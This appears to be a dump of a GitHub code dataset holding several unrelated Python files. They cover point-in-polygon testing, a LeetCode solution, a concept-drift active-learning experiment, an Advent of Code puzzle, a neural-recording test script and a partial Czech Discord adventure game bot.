token_id = self.token_revoke.insert_one(token).inserted_id\n        return token_id \n\n    @classmethod\n    def get(cls,token):\n        return cls.token_revoke.find_one({'jti':token})\n\n    @classmethod\n    def is_jti_blacklisted(cls, jti):\n        query = cls.token_revoke.find_one({\"jti\": jti})\n        return bool(query) \n","repo_name":"KornkamonS/python_api","sub_path":"Flask_restful/models/TokenRevoke.py","file_name":"TokenRevoke.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22781147906","text":"\"\"\"Simple method to detect points on the interior or exterior of a closed \npolygon. Returns a boolean for single points, or an array of booleans for a \nline masking the segment(s) of the line within the polygon.\n\nFor each point, operates via a ray-casting approach -- the function projects \na semi-infinite ray parallel to the positive horizontal axis, and counts how \nmany edges of the polygon this ray intersects. For a simply-connected \npolygon, this determines whether the point is inside (odd number of crossings) \nor outside (even number of crossings) the polygon, by the Jordan Curve Theorem.\n\"\"\"\nimport numpy as np\n\ndef contains(polyx,polyy,linex,liney):\n    \"\"\"Calculate whether given points are within a 2D simply-connected polygon.\n    Returns a boolean (or an array of booleans for array inputs).\n\n    ARGS:\n        polyx: array-like.\n            Array of x-coordinates of the vertices of a polygon.\n        polyy: array-like.\n            Array of y-coordinates of the vertices of a polygon. Must match \n            dimension of polyx.\n        linex: array-like or float.\n            x-coordinate(s) of test point(s).\n        liney: array-like or float.\n            y-coordinate(s) of test point(s). Must match dimension of linex.\n\n    RETURNS:\n        mask: boolean or array of booleans.\n            For each (linex,liney) point, True if point is in the polygon, \n            else False.\n    \"\"\"\n    # check type, dimensions of polyx,polyy\n    try:\n        # check that polyx, polyy are iterable\n        iter(polyx)\n        iter(polyy)\n    except TypeError:\n        raise TypeError(\"polyx, polyy must be iterable\")\n    if len(polyx) != len(polyy):\n        raise ValueError(\"polyx, polyy must be of same size\")\n    if len(polyx) < 3:\n        raise ValueError(\"polygon must consist of at least three points\")\n\n    # handler for single-value vs. 
array versions for linex, liney\n single_val = True\n try:\n iter(linex)\n except TypeError:\n linex = np.asarray([linex],dtype=float)\n else:\n linex = np.asarray(linex,dtype=float)\n single_val = False\n\n try:\n iter(liney)\n except TypeError:\n liney = np.asarray([liney],dtype=float)\n else:\n liney = np.asarray(liney,dtype=float)\n single_val = False\n\n if linex.shape != liney.shape:\n raise ValueError(\"linex, liney must be of same shape\")\n \n # generator for points in polygon\n def lines():\n p0x = polyx[-1]\n p0y = polyy[-1]\n p0 = (p0x,p0y)\n for i,x in enumerate(polyx):\n y = polyy[i]\n p1 = (x,y)\n yield p0,p1\n p0 = p1\n\n mask = np.array([False for i in range(len(linex))])\n for i,x in enumerate(linex):\n y = liney[i]\n result = False\n\n for p0,p1 in lines():\n if ((p0[1] > y) != (p1[1] > y)) and (x < ((p1[0]-p0[0])*(y-p0[1])/(p1[1]-p0[1]) + p0[0])):\n result = not result \n mask[i] = result\n\n # recast mask -- single Boolean if single_val inputs, else return array of booleans\n if single_val:\n mask = mask[0]\n\n return mask\n","repo_name":"jrwalk/inPolygon","sub_path":"inPolygon.py","file_name":"inPolygon.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30505999471","text":"#\n# @lc app=leetcode id=39 lang=python3\n#\n# [39] Combination Sum\n#\n\n# @lc code=start\n\n\nclass Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n ans = []\n start = 0\n candidates.sort()\n\n def dfs(candidates, target, cur, ans, start):\n if target == 0:\n ans.append(cur)\n return\n\n for i in range(start, len(candidates)):\n if candidates[i] > target:\n break\n dfs(candidates, target -\n candidates[i], cur+[candidates[i]], ans, i)\n\n dfs(candidates, target, [], ans, start)\n return ans\n# @lc code=end\n","repo_name":"naseeihity/leetcode-daily","sub_path":"search/39.combination-sum.py","file_name":"39.combination-sum.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74487458649","text":"import warnings\nimport pdb\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport copy\nfrom collections import deque\n\nfrom scipy.ndimage import gaussian_filter1d\nfrom skactiveml.utils import call_func\nfrom skactiveml.classifier import PWC\nfrom skactiveml.stream import FixedUncertainty, VariableUncertainty, Split, PALS, RandomSampler, PeriodicSampler\nfrom skactiveml.stream.budget_manager import FixedThresholdBudget, FixedUncertaintyBudget, BIQF, \\\n VariableUncertaintyBudget, SplitBudget, EstimatedBudget\nfrom skactiveml.stream.verification_latency import BaggingDelaySimulationWrapper, ForgettingWrapper, \\\n FuzzyDelaySimulationWrapper\nfrom skactiveml.classifier import SklearnClassifier\n\nfrom skmultiflow.drift_detection import PageHinkley, KSWIN, EDDM, DDM, HDDM_W, HDDM_A\nfrom skmultiflow.drift_detection.adwin import ADWIN\n\nfrom sklearn.datasets import make_blobs, make_classification\nfrom sklearn.svm import SVC\n\nfrom skmultiflow.trees import HoeffdingTreeClassifier\nfrom skmultiflow.lazy import KNNClassifier\n\nfrom src.concept_drift.skflow_detectors import HDDDM\n\nwarnings.filterwarnings(\"ignore\")\nplt.switch_backend('Qt5Agg')\n\n\ndef get_randomseed(random_state):\n return random_state.randint(2 ** 31 - 1)\n\n\ndef linear_interp(a, b, alpha):\n return a * alpha + (1 - alpha) * 
b\n\n\n######################################################################################################\nif __name__ == '__main__':\n    np.random.seed(0)\n    # random state that is used to generate random seeds\n    random_state = np.random.RandomState(0)\n    # number of instances that are provided to the classifier\n    init_train_length = 100\n    # the length of the data stream\n    stream_length = 1000\n    # the size of the sliding window that limits the training data\n    training_size = 500\n    # the verification latency occurring after querying a label\n    verification_latency = 100\n    budget = 0.1\n\n    # Parameters for delay wrapper\n    K = 2\n    w_train = training_size\n    delay_prior = 0.001\n\n    # create the data stream\n    # X, center = make_blobs(n_samples=init_train_length + stream_length, centers=30,\n    #                        random_state=get_randomseed(random_state), shuffle=True)\n    # y = center % 2\n\n    # X, y = make_classification(n_samples=init_train_length + stream_length, n_features=2, n_informative=2,\n    #                            n_redundant=0, n_repeated=0, n_classes=2, n_clusters_per_class=2, class_sep=1.0,\n    #                            random_state=get_randomseed(random_state), shuffle=True)\n\n    # Drifting Dataset\n    X, y, centers = make_blobs(n_samples=1000 + init_train_length, n_features=2, centers=[(-3, 3), (3, 3)], cluster_std=1.,\n                               return_centers=True)\n    x_test_, Y_test_, centers_end = make_blobs(n_samples=1000, n_features=2, centers=centers + 25,\n                                               cluster_std=1.0, return_centers=True)\n    X = np.vstack([X, x_test_])\n    y = np.hstack([y, Y_test_])\n    x_test_, Y_test_, centers_end = make_blobs(n_samples=1000, n_features=2, centers=centers - 25,\n                                               cluster_std=1.0, return_centers=True)\n    # Gradual drift\n    # for i in [x * 0.1 for x in range(1, 10, 1)]:\n    #     x_, y_ = make_blobs(n_samples=300, n_features=2,\n    #                         centers=linear_interp(centers_end, centers, i),\n    #                         cluster_std=1.0)\n    #     X = np.vstack([X, x_])\n    #     y = np.hstack([y, y_])\n    # X = np.vstack([X, x_test_])\n    # y = np.hstack([y, Y_test_])\n    stream_length = len(X)\n\n    X_init = X[:init_train_length, :]\n    y_init = y[:init_train_length]\n    X_stream = X[init_train_length:, :]\n    y_stream = y[init_train_length:]\n    # create the time stamps\n    # sample arrival\n    tX = np.arange(stream_length)\n    # label arrival\n    ty = tX + verification_latency\n    tX_init = tX[:init_train_length]\n    ty_init = ty[:init_train_length]\n    tX_stream = tX[init_train_length:]\n    ty_stream = ty[init_train_length:]\n\n    ######################################################################################################\n    drift_factory = {\n        'None': lambda qs: qs,\n        'DDM': lambda: DDM(min_num_instances=30 + verification_latency, warning_level=2.0, out_control_level=3.0),\n        'ADWIN': lambda: ADWIN(delta=2.),\n        'EDDM': lambda: EDDM(),\n        'PH': lambda: PageHinkley(min_instances=30 + verification_latency, delta=0.005, threshold=3, alpha=1 - 0.0001),\n        'HDDDM': lambda: HDDDM(window_size=training_size, min_samples=training_size // 2, warning_gamma=1.,\n                               change_gamma=2., dimension=X.shape[1])\n    }\n\n    ######################################################################################################\n    # clf_factory = lambda: PWC(classes=[0, 1], random_state=get_randomseed(random_state))\n    # clf_factory = lambda: SklearnClassifier(SVC(probability=True), classes=[0, 1], random_state=get_randomseed(random_state))\n    clf_factory = lambda: SklearnClassifier(HoeffdingTreeClassifier(), classes=[0, 1], random_state=get_randomseed(random_state))\n    # clf_factory = lambda : SklearnClassifier(KNNClassifier(n_neighbors=5, max_window_size=training_size), classes=[0, 1], 
random_state=get_randomseed(random_state))\n\n    missing_label = clf_factory().missing_label\n    query_strategies_factories = {\n        'RandomSampler': lambda: RandomSampler(random_state=get_randomseed(random_state),\n                                               budget_manager=FixedThresholdBudget(budget=budget)),\n        # 'PeriodicSampler': lambda: PeriodicSampler(random_state=get_randomseed(random_state),\n        #                                            budget_manager=FixedThresholdBudget(budget=budget)),\n        # 'FixedUncertainty': lambda: FixedUncertainty(random_state=get_randomseed(random_state),\n        #                                              budget_manager=FixedUncertaintyBudget(budget=budget)),\n        #'VariableUncertainty': lambda: VariableUncertainty(random_state=get_randomseed(random_state),\n        #                                                   budget_manager=VariableUncertaintyBudget(budget=budget)),\n        'Split': lambda: Split(random_state=get_randomseed(random_state), budget_manager=SplitBudget(budget=budget)),\n        'PALS': lambda: PALS(random_state=get_randomseed(random_state), budget_manager=BIQF(budget=budget))\n    }\n\n    for query_strategy_name, query_strategy_factory in query_strategies_factories.items():\n        delay_wrappers_factories = {\n            'None': lambda qs: qs,\n            #'Forgetting': lambda qs: ForgettingWrapper(base_query_strategy=qs, w_train=w_train,\n            #                                           random_state=get_randomseed(random_state)),\n            # 'BaggingDelaySimulation': lambda qs: BaggingDelaySimulationWrapper(base_query_strategy=qs,\n            #                                                                    random_state=get_randomseed(\n            #                                                                        random_state), K=K,\n            #                                                                    delay_prior=delay_prior),\n            # 'FuzzyDelaySimulation': lambda qs: FuzzyDelaySimulationWrapper(base_query_strategy=qs,\n            #                                                                random_state=get_randomseed(random_state),\n            #                                                                delay_prior=delay_prior)\n        }\n        # delay_wrappers_factories[\"Forgetting + Bagging\"] = lambda qs: delay_wrappers_factories[\"Forgetting\"](\n        #     BaggingDelaySimulationWrapper(base_query_strategy=qs,\n        #                                   random_state=get_randomseed(\n        #                                       random_state), K=K,\n        #                                   delay_prior=delay_prior))\n        # delay_wrappers_factories[\"Forgetting + Fuzzy\"] = lambda qs: delay_wrappers_factories[\"Forgetting\"](\n        #     delay_wrappers_factories[\"FuzzyDelaySimulation\"](qs))\n        print(\"Query Strategy: \", query_strategy_name)\n        plt.figure()\n        for delay_wrapper_name, delay_wrapper_factory in delay_wrappers_factories.items():\n            u_drift = drift_factory['HDDDM']()\n            s_drift = drift_factory['PH']()\n            clf = clf_factory()\n            # initializing the query strategy\n            delay_wrapper = delay_wrapper_factory(query_strategy_factory())\n            # initializing the training data\n            X_train = deque(maxlen=training_size)\n            X_train.extend(X_init)\n            y_train = deque(maxlen=training_size)\n            y_train.extend(y_init)\n            # initialize the time stamps corresponding to the training data\n            tX_train = deque(maxlen=training_size)\n            tX_train.extend(tX_init)\n            ty_train = deque(maxlen=training_size)\n            ty_train.extend(ty_init)\n            # initializing the acquisition vector\n            acquisitions = deque(maxlen=training_size)\n            acquisitions.extend(np.full(len(y_train), True))\n            # train the model with the initially available data\n            clf.fit(X_train, y_train)\n            yhat = clf.predict(X_train)\n            # initialize the list that stores the result of the classifier's prediction\n            correct_classifications = [y_ == y for y_, y in zip(yhat, y_train)]\n            init_acc = np.sum(correct_classifications) / len(yhat)\n            print('Init class accuracy: {}'.format(init_acc))\n            # Initialize the drift detectors\n            err_sig = 1 - (np.asarray(correct_classifications).astype(int))\n            for e in X_train:\n                u_drift.add_element(e)\n            for e in err_sig:\n                s_drift.add_element(e)\n            # initialize the number of acquired labels\n            count = 0\n            u_drift_idx = []\n            s_drift_idx = []\n            drift_flag = False\n            # iterate over the whole 
data stream\n            for t, (x_t, y_t, tX_t, ty_t) in enumerate(zip(X_stream, y_stream, tX_stream, ty_stream)):\n                # infer the currently available labels\n                # missing_label is used to denote unlabeled instances\n                X_cand = x_t.reshape([1, -1])\n                y_cand = y_t\n                tX_cand = tX_t\n                ty_cand = ty_t\n\n                # manage label delay: do not forget samples, and do not add labels that are still unavailable due to delay\n                y_train_current = np.array(\n                    [y if ty < tX_cand and a else missing_label for ty, y, a in zip(ty_train, y_train, acquisitions)])\n                # Semi-supervised drift detection\n                if len(y_train_current) > verification_latency:\n                    last_queried = y_train_current[-verification_latency - 1]\n                    if not np.isnan(last_queried):\n                        e = 1 - (np.asarray(correct_classifications)[-verification_latency - 1]).astype(int)\n                        s_drift.add_element(e)\n                        if s_drift.detected_change():\n                            s_drift_idx.append(t)\n                            drift_flag = True\n                            # true_acquisitions = [ty < tX_cand and a for ty, a in zip(ty_train, acquisitions)]\n                            # pending_acq = np.sum(np.asarray(true_acquisitions) == False)\n                            # n = len(acquisitions)\n                            # acquisitions.clear()\n                            # acquisitions.extend([False for _ in range(n)])\n                            # y_train_current = np.full(len(y_train_current), np.nan)\n                        else:\n                            drift_flag = False\n                # Unsupervised drift\n                u_drift.add_element(X_cand)\n                if u_drift.detected_change():\n                    u_drift_idx.append(t)\n                    drift_flag = True\n                else:\n                    drift_flag = False\n\n                # evaluation strategy: test-then-train\n                # evaluate the prediction of the classifier\n                yhat = clf.predict(X_cand)[0]\n                correct_classifications.append(yhat == y_cand)\n                # train the classifier\n                if np.sum(~np.isnan(y_train_current)) > 0:\n                    clf.fit(np.array(X_train), np.array(y_train_current))\n\n                # check whether to sample the instance or not\n                sampled_indices, utilities = call_func(delay_wrapper.query, X_cand=X_cand, clf=clf, X=np.array(X_train),\n                                                       y=np.array(y_train_current),\n                                                       tX=np.array(tX_train), ty=np.array(ty_train),\n                                                       tX_cand=[tX_cand],\n                                                       ty_cand=[ty_cand], return_utilities=True,\n                                                       acquisitions=acquisitions,\n                                                       drift=False)\n                # create budget_manager_param_dict for BIQF used by PALS\n                budget_manager_param_dict = {\"utilities\": utilities}\n                delay_wrapper.update(X_cand, sampled_indices, budget_manager_param_dict)\n                # set the entry within the acquisition vector according to the query strategy's decision\n                acquisitions.append((len(sampled_indices) > 0))\n                if len(sampled_indices):\n                    count += 1\n\n                # add the current instance to the training data\n                tX_train.append(tX_cand)\n                ty_train.append(ty_cand)\n                X_train.append(x_t)\n                y_train.append(y_cand)\n            # calculate and show the average accuracy\n            print(\"Delay Wrapper: \", delay_wrapper_name, \", Avg Accuracy: \",\n                  np.sum(correct_classifications) / stream_length, \", Number of acquired instances: \", count)\n            # smoothed_curve = gaussian_filter1d(np.array(correct_classifications, dtype=float), 20)\n            # smoothed_curve = np.array(correct_classifications)\n            # smoothing the accuracy for plotting\n            smoothing_window_length = 100\n            s_idx = np.asarray(s_drift_idx)  # - smoothing_window_length + init_train_length + 1\n            u_idx = np.asarray(u_drift_idx)  # - smoothing_window_length + init_train_length + 1\n            # cumsum_correct_classifications = np.cumsum(correct_classifications)\n            # smoothed_curve = (cumsum_correct_classifications[smoothing_window_length:] -\n            #                   cumsum_correct_classifications[:-smoothing_window_length]) / smoothing_window_length\n            # smoothed_curve = np.asarray(correct_classifications)\n            smoothed_curve = np.convolve(correct_classifications, np.ones(smoothing_window_length),\n                                         mode='valid') / 
smoothing_window_length  # len: max(M,N) - min(M,N) + 1\n            plt.plot(smoothed_curve, label=delay_wrapper_name)\n            try:\n                plt.plot(s_idx, smoothed_curve[s_idx], 'x', c='red', alpha=1.0, label='Supervised Drift points')\n                plt.plot(u_idx, smoothed_curve[u_idx], 'x', c='blue', alpha=1.0, label='Unsupervised Drift points')\n            except:\n                print('Drift not found')\n        plt.title(f'{query_strategy_name}')\n        if query_strategy_name == 'RandomSampler':\n            break\n    plt.legend()\n    plt.show(block=True)\n","repo_name":"Castel44/AL_delay","sub_path":"src/active_learning_drift.py","file_name":"active_learning_drift.py","file_ext":"py","file_size_in_byte":15612,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"13389352018","text":"\n\npeso_peixe = float(input('Enter the weight of the fish: '))\n\npeso_excesso = peso_peixe - 50\n\nif peso_excesso > 0:\n    multa = peso_excesso*4.00\n    print('\nThe fish is {} kilos over the limit. You must pay a fine of R$ {}'.format(peso_excesso,multa))\nelse:\n    print('The weight of the fish is within the limit')","repo_name":"Lucas-Davys/Exercicios-em-Python","sub_path":"Exercício 13.py","file_name":"Exercício 13.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38383551409","text":"from collections import defaultdict\nfrom typing import List, Set, Tuple\n\nfrom aocpuzzle import AoCPuzzle\n\n\nclass Puzzle07(AoCPuzzle):\n    def common(self, input_data: List[str]) -> None:\n        self.bags = defaultdict(list)\n        self.inner_bags = defaultdict(list)\n\n        for rule in input_data:\n            outer_bag, inner_bags = rule.split(' bags contain ')\n\n            if inner_bags == 'no other bags.':\n                continue\n\n            for inner_bag in inner_bags.split(', '):\n                ob = tuple(outer_bag.split())\n                ib = tuple(inner_bag.split()[:-1])\n\n                self.bags[ob].append(ib)\n                self.inner_bags[ib[1:3]].append(ob)\n\n    def part1(self) -> int:\n        bags: Set = set()\n\n        q, visited = [('shiny', 'gold')], []\n\n        while len(q) > 0:\n            bag = q.pop(0)\n\n            for inner_bag in self.inner_bags[bag]:\n                if inner_bag not in visited:\n                    bags.add(inner_bag)\n                    q.append((inner_bag[0], inner_bag[1]))\n            visited.append(bag)\n        return len(bags)\n\n    def count(self, color: Tuple[str, str]) -> int:\n        bags_count = 0\n\n        for bag in self.bags[color]:\n            bags_count += int(bag[0]) + (self.count((bag[1], bag[2])) * int(bag[0]))\n\n        return bags_count\n\n    def part2(self) -> int:\n        return self.count(('shiny', 'gold'))\n\n    def test_cases(self, input_data: List[str]) -> int:\n        part1_tests = [\n            'light red bags contain 1 bright white bag, 2 muted yellow bags.',\n            'dark orange bags contain 3 bright white bags, 4 muted yellow bags.',\n            'bright white bags contain 1 shiny gold bag.',\n            'muted yellow bags contain 2 shiny gold bags, 9 faded blue bags.',\n            'shiny gold bags contain 1 dark olive bag, 2 vibrant plum bags.',\n            'dark olive bags contain 3 faded blue bags, 4 dotted black bags.',\n            'vibrant plum bags contain 5 faded blue bags, 6 dotted black bags.',\n            'faded blue bags contain no other bags.',\n            'dotted black bags contain no other bags.',\n        ]\n        part2_tests = [\n            'shiny gold bags contain 2 dark red bags.',\n            'dark red bags contain 2 dark orange bags.',\n            'dark orange bags contain 2 dark yellow bags.',\n            'dark yellow bags contain 2 dark green bags.',\n            'dark green bags contain 2 dark blue bags.',\n            'dark blue bags contain 2 dark violet bags.',\n            'dark violet bags contain no other bags.',\n        ]\n\n        self.common(part1_tests)\n        assert 
self.part1() == 4\n\n self.common(input_data)\n assert self.part1() == 302\n\n self.common(part2_tests)\n assert self.part2() == 126\n\n self.common(input_data)\n assert self.part2() == 4165\n\n return 3\n","repo_name":"cpallapolu/advent-of-code","sub_path":"src/years/2020/07/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14248094000","text":"import pytest\n\npytestmark = pytest.mark.asyncio\n\n\nclass TestWorkerConnectedAndHasWork:\n async def test(\n self, worker_connected_usecase, worker_has_work_usecase,\n work_saver, work_details_usecase,\n fixt_new_worker_dto, fixt_work, fixt_user\n ):\n db_work = await work_saver.save(fixt_work, fixt_user.user_id)\n work = fixt_work._replace(work_id=db_work.work_id)\n await worker_connected_usecase.perform(fixt_new_worker_dto)\n\n await worker_has_work_usecase.perform(fixt_new_worker_dto.worker_socket, work)\n\n work_details = await work_details_usecase.perform(\n work_id=work.work_id, user_id=fixt_user.user_id\n )\n\n last_event = work_details['events'][-1]\n assert last_event['status'] == 'PROCESSING'\n assert last_event['reason'] == 'worker_has_work'\n\n\n\n\n\n\n\n\n","repo_name":"mwalercz/yawsm","sub_path":"tests/component/usecases/test_worker_connected_and_has_work.py","file_name":"test_worker_connected_and_has_work.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36169697548","text":"'''Test script to receive and print spike/event data using cbpy'''\n\nfrom CereLink import cbpy\nimport time\n\nparameters = dict()\nparameters['inst-addr'] = '192.168.137.128'\nparameters['inst-port'] = 51001\nparameters['client-addr'] = '255.255.255.255'\nparameters['client-port'] = 51002\n\nprint('calling cbpy.open()')\nreturn_dict = cbpy.open('default', parameters)\nprint('connection:', return_dict['connection'])\nprint('instrument:', return_dict['instrument'])\n\ntry:\n print('calling cbpy.trial_config()')\n return_dict = cbpy.trial_config(True)\n # trial_config doesn't return a dict as advertised -- instead, returns a boolean (?)\n # print 'label:', return_dict['label']\n # print 'enabled:', return_dict['enabled']\n # print 'valid_unit:', return_dict['valid_unit']\n\n n_itrs = 20\n loop_time = 0.1\n\n for itr in range(n_itrs):\n t_start = time.time()\n print('\\nitr %d of %d:' % (itr+1, n_itrs))\n\n print('calling cbpy.trial_event()')\n # returns a list of tuples: (channel, digital_events) or (channel, unit0_ts, ..., unitN_ts)\n data = cbpy.trial_event(True)\n print('data:', data)\n\n t_elapsed = time.time() - t_start\n if t_elapsed < loop_time:\n time.sleep(loop_time - t_elapsed)\n print('t_elapsed: %3.3f secs, loop time: %3.3f secs' % (t_elapsed, time.time()-t_start))\n\nfinally:\n print('calling cbpy.close()')\n cbpy.close()\n","repo_name":"carmenalab/brain-python-interface","sub_path":"tests/ibmi/blackrock/cbpy_basic.py","file_name":"cbpy_basic.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"27963946870","text":"from __future__ import annotations\n\nimport discord\nimport yaml\nimport os\nimport argparse\n\nfrom datetime import datetime\nfrom typing import *\nfrom random import choice, randint, uniform\nfrom dataclasses import dataclass\nfrom enum import Enum, auto\nfrom functools import 
partial\n\n\nscript_path = os.path.dirname(os.path.abspath(__file__))\nbackup_path = os.path.join(script_path, \"backup\")\n\n\n# dictionary with the data for all teams\n# the key is always the channel ID of the given team\ndata = { }\nchannels = { }\norg_channel = None\n\nstarted = False\nlast_save_time = datetime.now()\n\nasync def save():\n    \"\"\"Saves the state of the game.\"\"\"\n    global data, org_channel\n\n    if not os.path.exists(backup_path):\n        os.mkdir(backup_path)\n\n    backup_name = datetime.now().strftime(\"%Y%m%d_%H%M%S\") + \".yaml\"\n\n    with open(os.path.join(backup_path, backup_name), \"w\") as f:\n        yaml.dump(data, f)\n\n\ndef load():\n    \"\"\"Loads the state of the game.\"\"\"\n    global data\n\n    # no backup yet\n    if len(os.listdir(backup_path)) == 0:\n        return\n\n    # the newest backup\n    backup_name = sorted(os.listdir(backup_path))[-1]\n    with open(os.path.join(backup_path, backup_name), \"r\") as f:\n        data = yaml.safe_load(f)\n\n\n# ---\n\nclass TicTacToe:\n\n    def stripUnwanted(data):\n        \"\"\"Drop leading entries that are not positive integers (i.e. not valid moves).\"\"\"\n        d = list(data)\n        while len(d) != 0 and (not isinstance(d[0], int) or d[0] <= 0):\n            d.pop(0)\n        return d\n\n    def show(data):\n        \"\"\"Display the board neatly.\"\"\"\n        data = TicTacToe.stripUnwanted(data)\n\n        board = [\n            [\" \", \" \", \" \"],\n            [\" \", \" \", \" \"],\n            [\" \", \" \", \" \"],\n        ]\n\n        for i in range(0, len(data), 2):\n            i = data[i] - 1\n            board[i // 3][i % 3] = \"X\"\n\n        for i in range(1, len(data), 2):\n            i = data[i] - 1\n            board[i // 3][i % 3] = \"O\"\n\n        result = f\"```\\n\"\n        for i, row in enumerate(board):\n            result += \"|\".join(row) + \"\\n\" + (\"\" if i == len(board) - 1 else \"-----\\n\")\n\n        return result + \"```\"\n\n    def won(data):\n        \"\"\"0 if draw, 1 if p1 win, 2 if p2 win.\"\"\"\n        data = TicTacToe.stripUnwanted(data)\n\n        p1 = [data[i] - 1 for i in range(0, len(data), 2)]\n        p2 = [data[i] - 1 for i in range(1, len(data), 2)]\n\n        wins = ((0, 1, 2), (3, 4, 5), (6, 7, 8), (0, 3, 6), (1, 4, 7), (2, 5, 8), (0, 4, 8), (2, 4, 6))\n\n        # p1 wins\n        for win in wins:\n            for tile in win:\n                if tile not in p1:\n                    break\n            else:\n                return 1\n\n        # p2 wins\n        for win in wins:\n            for tile in win:\n                if tile not in p2:\n                    break\n            else:\n                return 2\n\n        # draw\n        return 0\n\n    def valid_moves(data):\n        \"\"\"Valid moves for either player.\"\"\"\n        data = TicTacToe.stripUnwanted(data)\n\n        return [i for i in range(1, 10) if i not in data]\n\n\n# ---\n\n\nclient = discord.Client()\n\nclass Utilities:\n    def get_data(id):\n        global data\n        return data[id]\n\n    def get_location(id):\n        return locations[Utilities.get_data(id)['location']]\n\n    def set_location(id, location: Location):\n        Utilities.get_data(id)['location'] = locations.index(location)\n\n    def get_location_position(id):\n        return Utilities.get_data(id)['location_position']\n\n    def set_location_position(id, position):\n        Utilities.get_data(id)['location_position'] = position\n\n    def get_items(id):\n        return Utilities.get_data(id)['items']\n\n    def get_channel(id):\n        global channels\n        return channels[id]\n\n\nclass Action:\n    \"\"\"Actions that can occur at the end of dialogues.\"\"\"\n\n    def obtainItem(item):\n        \"\"\"Obtain the given item.\"\"\"\n        return partial(lambda i, id: Utilities.get_items(id).append(i.value), item)\n\n    def moveToMinigame(id):\n        \"\"\"Move to the minigame of the given location.\"\"\"\n        Utilities.get_location_position(id).append(-1)\n\n\n# ---------------------------------------- CONTENT ----------------------------------------\n\nclass Item(Enum):\n    \"\"\"Enum of all items.\"\"\"\n    vysano = \"vysano\"\n    rozsviceno = \"rozsviceno\"\n    zrychleno = \"zrychleno\"\n    pametfix = \"pametfix\"\n    zdrojporazen = 
\"zdrojporazen\"\n    pametsofware = \"pametsofware\"\n    mbinstruction = \"mbinstruction\"\n\n\nclass Special(Enum):\n    \"\"\"Special properties of the various locations.\"\"\"\n    darkness = auto() # messages are written in spoilers\n    loud = auto() # you have to shout\n    please = auto() # you have to shout\n\n\ndef no(item):\n    \"\"\"Partial function checking that the team does NOT have the given item.\"\"\"\n    return partial(lambda x, y: x not in y, item)\n\ndef yes(item):\n    \"\"\"Partial function checking that the team has the given item.\"\"\"\n    return partial(lambda x, y: x in y, item)\n\n\ndef format_remaining_time(s):\n    if s >= 60 * 60 * 24 * 7:\n        return f\"Zbývá ~`{s // (60 * 60 * 24 * 7)}` týdnů.\"\n\n    if s >= 60 * 60 * 24:\n        return f\"Zbývá ~`{s // (60 * 60 * 24)}` dnů.\"\n\n    if s >= 60 * 60:\n        return f\"Zbývá ~`{s // (60 * 60)}` hodin.\"\n\n    if s >= 60:\n        return f\"Zbývá ~`{s // (60)}` minut.\"\n\n    return f\"Zbývá ~`{s}` sekund.\"\n\n\n@dataclass(frozen=True)\nclass Vysavac:\n    name = \"Vysavač\"\n    at = \"u vysavače\"\n    to = \"k vysavači\"\n\n    description = \"\"\"Přes síťovou kartu se vám povedlo bit po bitu přenést se k vysavači. Měli jste pocit, že se cestou něco zadrhlo,\n    tak jste si radši třikrát zkontrolovali své kontrolní součty. A opravdu, kus vám chybí!!! Co teď budete děla... Ah, počkat,\n    poslední kus se právě přenesl. Uf, vypadá to v pořádku, díky tvůrcům za to, že jste se rozhodli přenést se pomocí TCP a ne jen UDP.\n\n    Když jste se pořádně rozhlédli okolo, tak jste zjistili, že jste se asi dostali do obslužné stanice těsně vedle vysavače. Ten\n    vedle vás spokojeně podřimuje a nevypadá to, že by vám chtěl věnovat jakoukoliv pozornost. Prozkoumali jste obvody obslužné stanice\n    a zjistili jste, že můžete provádět nějaké akce.\n    \"\"\"\n\n    dialogue = [\n        (no(Item.vysano.value), [],\n         [('zapojit', \"Zkusit `zapojit` spící vysavač do zásuvky.\", [\"Jau, co děláš, já jsem na baterky!\"],\n           [('promiň', '`Promiň`, to nám nedošlo.', [], [])]\n           ),\n          ('popostrčit', \"Zkusit vysavač `popostrčit`.\", [\"Co do mě strkáš?\"],\n           [(\"povysávat\", \"Potřebujeme u počítače trochu `povysávat`, pomůžeš?\", [\"Pokud do mě už nebudete strkat, tak ano. Potřeboval bych ale navigovat.\"],\n             [('nanavigujeme', \"Jasně, `nanavigujeme`!\", [], Action.moveToMinigame),\n              ('ne', \"Promiň, spíš `ne`, to zní komplikovaně.\", [], []),\n              ]\n             ),\n            ]\n           ),\n          ]\n         ),\n        (yes(Item.vysano.value), [\"Rrrrrrrrrrrrr.\", \"Rrrr.\", \"Rrrrrrr.\"], []\n         )\n    ]\n\n    special = []\n\n\n@dataclass(frozen=True)\nclass Sitovka:\n    name = \"Síťová karta\"\n    at = \"u síťové karty\"\n    to = \"k síťové kartě\"\n\n    description = \"\"\"Okolo vás probíhá spousta komunikace, vypadá to tu jako na velmi rušné poště. Z velké temné chodby vybíhají velkou\n    rychlostí pakety s velkým batůžkem dat na zádech, které si síťová karta prohlíží a podle čísel portů je posílá v počítači dál. Jak tak provoz\n    pozorujete, tak si všimnete, že občas dorazí paket, který v ruce drží již úplně prázdné přesýpací hodiny. Před každým takovýmhle paketem\n    se zjeví Paketový SMRŤ, výmluvně se na něj podívá, mávne bitovou kosou a paket se rozplyne. Otřesete se - snad existuje nějaké paketové nebe.\n\n    Naopak na druhé straně si všímáte veliké antény, do které odvážně lezou jiné pakety s pilotní čepicí narvanou na hlavě. To je jen pro ty odvážné,\n    ale na nějaké místa 